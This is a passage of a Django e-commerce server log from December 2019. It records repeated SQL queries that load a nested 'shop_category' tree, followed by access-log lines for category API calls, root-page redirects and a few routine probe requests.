"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 14:12:51,657 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 14:12:51,660 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 14:12:51,662 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 14:12:51,664 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 14:12:51,668 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 14:12:51,670 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 14:12:51,673 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 14:12:51,675 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 14:12:51,677 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 14:12:51,680 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 14:12:51,682 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 14:12:51,685 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 14:12:51,687 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 14:12:51,690 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 14:12:51,692 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 14:12:51] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 14:15:08] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 14:20:04,077 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 14:20:04,085 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 14:20:04,089 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 14:20:04,091 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 14:20:04,095 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 14:20:04,098 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 14:20:04,102 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 14:20:04,104 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 14:20:04,107 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 14:20:04,110 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 14:20:04,113 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 14:20:04,115 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 14:20:04,117 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 14:20:04,120 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 14:20:04,123 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 14:20:04,126 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 14:20:04,128 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 14:20:04,130 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 14:20:04,132 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 14:20:04,136 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 14:20:04,138 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 14:20:04,140 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 14:20:04,143 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 14:20:04,146 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 14:20:04,148 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 14:20:04,152 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 14:20:04,154 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 14:20:04,157 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 14:20:04,159 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 14:20:04,161 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 14:20:04,165 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 14:20:04,167 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 14:20:04,170 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 14:20:04,172 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 14:20:04,175 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 14:20:04,179 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 14:20:04,181 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 14:20:04,184 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 14:20:04,186 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 14:20:04,190 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 14:20:04,194 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 14:20:04,199 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 14:20:04,201 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 14:20:04,205 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 14:20:04,209 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 14:20:04,212 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 14:20:04] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 14:20:10] "GET / HTTP/1.0" 302 0 [19/Dec/2019 14:25:13] "GET / HTTP/1.0" 302 0 [19/Dec/2019 14:30:16] "GET / HTTP/1.0" 302 0 [19/Dec/2019 14:35:19] "GET / HTTP/1.0" 302 0 [19/Dec/2019 14:40:01] "GET /whm-server-status HTTP/1.0" 301 0 [19/Dec/2019 14:40:22] "GET / HTTP/1.0" 302 0 [19/Dec/2019 14:45:24] "GET / HTTP/1.0" 302 0 [19/Dec/2019 14:50:27] "GET / HTTP/1.0" 302 0 [19/Dec/2019 14:55:29] "GET / HTTP/1.0" 302 0 [19/Dec/2019 15:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [19/Dec/2019 15:02:08] "GET / HTTP/1.0" 302 0 [19/Dec/2019 15:10:04] "GET / HTTP/1.0" 302 0 [19/Dec/2019 15:19:32] "GET / HTTP/1.0" 302 0 [19/Dec/2019 15:24:35] "GET / HTTP/1.0" 302 0 [19/Dec/2019 15:25:47] "GET / HTTP/1.0" 302 0 [19/Dec/2019 15:29:37] "GET / HTTP/1.0" 302 0 [19/Dec/2019 15:34:40] "GET / HTTP/1.0" 302 0 [19/Dec/2019 15:39:43] "GET / HTTP/1.0" 302 0 [19/Dec/2019 15:44:46] "GET / HTTP/1.0" 302 0 [19/Dec/2019 15:49:48] "GET / HTTP/1.0" 302 0 [19/Dec/2019 15:58:24] "GET / HTTP/1.0" 302 0 [19/Dec/2019 16:05:02] "GET / HTTP/1.0" 302 0 [19/Dec/2019 16:11:52] "GET / HTTP/1.0" 302 0 [19/Dec/2019 16:16:54] "GET / HTTP/1.0" 302 0 [19/Dec/2019 16:21:57] "GET / HTTP/1.0" 302 0 [19/Dec/2019 16:27:00] "GET / HTTP/1.0" 302 0 [19/Dec/2019 16:32:02] "GET / HTTP/1.0" 302 0 [19/Dec/2019 16:36:06] "GET / HTTP/1.0" 302 0 [19/Dec/2019 16:37:05] "GET / HTTP/1.0" 302 0 Not Found: /clientaccesspolicy.xml [19/Dec/2019 16:42:54] "GET /clientaccesspolicy.xml HTTP/1.0" 404 6486 [19/Dec/2019 16:43:20] "GET / HTTP/1.0" 302 0 [19/Dec/2019 16:52:09] "GET / HTTP/1.0" 302 0 [19/Dec/2019 16:58:58] "GET / HTTP/1.0" 302 0 [19/Dec/2019 17:05:03] "GET / HTTP/1.0" 302 0 [19/Dec/2019 17:14:29] "GET / HTTP/1.0" 302 0 [19/Dec/2019 17:19:32] "GET / HTTP/1.0" 302 0 [19/Dec/2019 17:24:34] "GET / HTTP/1.0" 302 0 [19/Dec/2019 17:31:22] "GET / 